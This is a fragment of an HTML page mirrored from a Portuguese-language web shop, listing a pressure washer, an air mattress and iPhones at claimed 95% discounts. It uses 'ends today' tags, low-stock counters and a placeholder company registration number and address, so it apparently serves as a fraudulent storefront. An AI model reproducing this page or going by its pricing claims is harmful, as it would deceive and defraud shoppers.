onclick="window.location.href='../produtos/vap/index.html'+window.location.search;">
            <div class="product-image">
                <img src="images/vap.jpeg" style="height: 130px; width: auto;">
            </div>
            <div class="product-info">
                <div class="offer-tag">TERMINA HOJE</div>

                <div class="old-price">R$ 1300,90</div>

                <span class="new-price">R$ 119,99</span><span class="discount">95% OFF</span>

                <div class="free-shipping-container">
                    <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span><span style="font-family: 'GellixSemiBold';">FULL</span></span>
                </div>

                <div style="background-color: #fffccb; width: 81%; border-radius: 5px; padding: 0px 5px">
                    <p style="font-size: 12px; color: #585004; font-family: 'GellixRegular'; margin-left: 2%;">Restam 6 unidades</p>
                </div>

                <p class="product-name">Lavadora de Alta Pressão WAP Líder 2200 1750W com 1800psi de pressão máxima</p>
            </div>
        </div>

        <!--------------------- box --------------------->


        <div class="bracelet-item"
onclick="window.location.href='../box/index.html'+window.location.search;">
            <div class="product-image">
                <img src="images/box.png" style="height: 130px; width: auto;">
            </div>
            <div class="product-info">
                <div class="offer-tag">TERMINA HOJE</div>

                <div class="old-price">R$ 1590,90</div>

                <span class="new-price">R$ 139,90</span><span class="discount">95% OFF</span>

                <div class="free-shipping-container">
                    <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span><span style="font-family: 'GellixSemiBold';">FULL</span></span>
                </div>

                <div style="background-color: #fffccb; width: 81%; border-radius: 5px; padding: 0px 5px">
                    <p style="font-size: 12px; color: #585004; font-family: 'GellixRegular'; margin-left: 2%;">Restam 9 unidades</p>
                </div>

                <p class="product-name">Colchão Inflável JoyFox + Bomba Eletrica Bateria Lítio + 2 Travesseiros Joyfox</p>
            </div>
        </div>




      <div class="bracelet-item">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/poco_antigo.webp" style="height: 115px; width: auto; margin-top: 20px;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="offer-tag" style="background-color: red; margin-top: 20px; margin-bottom: 5px;">
            <div class="free-shipping-container">
              <span class="free-shipping" style="font-family: 'GellixMedium'; color: white;">
                <span class="material-symbols-outlined" style="color:white; margin-right: 2px; font-size: 18px; margin-left: 0px;">close</span>
                <span style="font-family: 'GellixSemiBold'; margin-right: 5px;">ESGOTADO</span>
              </span>
            </div>
          </div>
          <p class="product-name">JBL GO 4 <span style="font-family: 'GellixBold';">Preta</span>
          </p>
        </div>
      </div>
      <div class="bracelet-item">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/iphone_15_azul.jpg" style="height: 115px; width: auto; margin-top: 20px;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="offer-tag" style="background-color: red; margin-top: 20px; margin-bottom: 5px;">
            <div class="free-shipping-container">
              <span class="free-shipping" style="font-family: 'GellixMedium'; color: white;">
                <span class="material-symbols-outlined" style="color:white; margin-right: 2px; font-size: 18px; margin-left: 0px;">close</span>
                <span style="font-family: 'GellixSemiBold'; margin-right: 5px;">ESGOTADO</span>
              </span>
            </div>
          </div>
          <p class="product-name">Apple iPhone 15 Pro Max (256 GB) <span style="font-family: 'GellixBold';">Azul</span>
          </p>
        </div>
      </div>
      <div class="bracelet-item">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/iphone_15_verde.jpg" style="height: 115px; width: auto; margin-top: 20px;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="offer-tag" style="background-color: red; margin-top: 20px; margin-bottom: 5px;">
            <div class="free-shipping-container">
              <span class="free-shipping" style="font-family: 'GellixMedium'; color: white;">
                <span class="material-symbols-outlined" style="color:white; margin-right: 2px; font-size: 18px; margin-left: 0px;">close</span>
                <span style="font-family: 'GellixSemiBold'; margin-right: 5px;">ESGOTADO</span>
              </span>
            </div>
          </div>
          <p class="product-name">iPhone 15 Pro Max (256 GB) <span style="font-family: 'GellixBold';">Verde</span>
          </p>
        </div>
      </div>
      <div class="bracelet-item">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/n.jpeg" style="height: 115px; width: auto; margin-top: 20px;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="offer-tag" style="background-color: red; margin-top: 20px; margin-bottom: 5px;">
            <div class="free-shipping-container">
              <span class="free-shipping" style="font-family: 'GellixMedium'; color: white;">
                <span class="material-symbols-outlined" style="color:white; margin-right: 2px; font-size: 18px; margin-left: 0px;">close</span>
                <span style="font-family: 'GellixSemiBold'; margin-right: 5px;">ESGOTADO</span>
              </span>
            </div>
          </div>
          <p class="product-name">Apple iPhone 15 Pro Max (256 GB) <span style="font-family: 'GellixBold';">Dourado</span>
          </p>
        </div>
      </div>
      <div class="bracelet-item">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/ipad_10.jpg" style="height: 115px; width: auto; margin-top: 20px;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="offer-tag" style="background-color: red; margin-top: 20px; margin-bottom: 5px;">
            <div class="free-shipping-container">
              <span class="free-shipping" style="font-family: 'GellixMedium'; color: white;">
                <span class="material-symbols-outlined" style="color:white; margin-right: 2px; font-size: 18px; margin-left: 0px;">close</span>
                <span style="font-family: 'GellixSemiBold'; margin-right: 5px;">ESGOTADO</span>
              </span>
            </div>
          </div>
          <p class="product-name">Apple iPhone 15 Pro Max (256 GB) <span>Titânio Azul</span>
          </p>
        </div>
      </div>
    </div>
    <div class="divisoria2"></div>
    <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;">
      <span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span>
      <br>
      <br>© 1999-2024 Todos os direitos reservados. CNPJ n.º 00.000.000/0001-00 / Endereço da loja, nº 000, Bairro, Cidade/UF - CEP 00000-000 - empresa própria. <span style="font-family: 'GellixSemiBold';">
        <br>
        <br>Brasil/Português </span>
    </p>


</body><!-- Mirrored from exclusivalojas.com/loja/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 15 Oct 2024 14:43:04 GMT --></html>


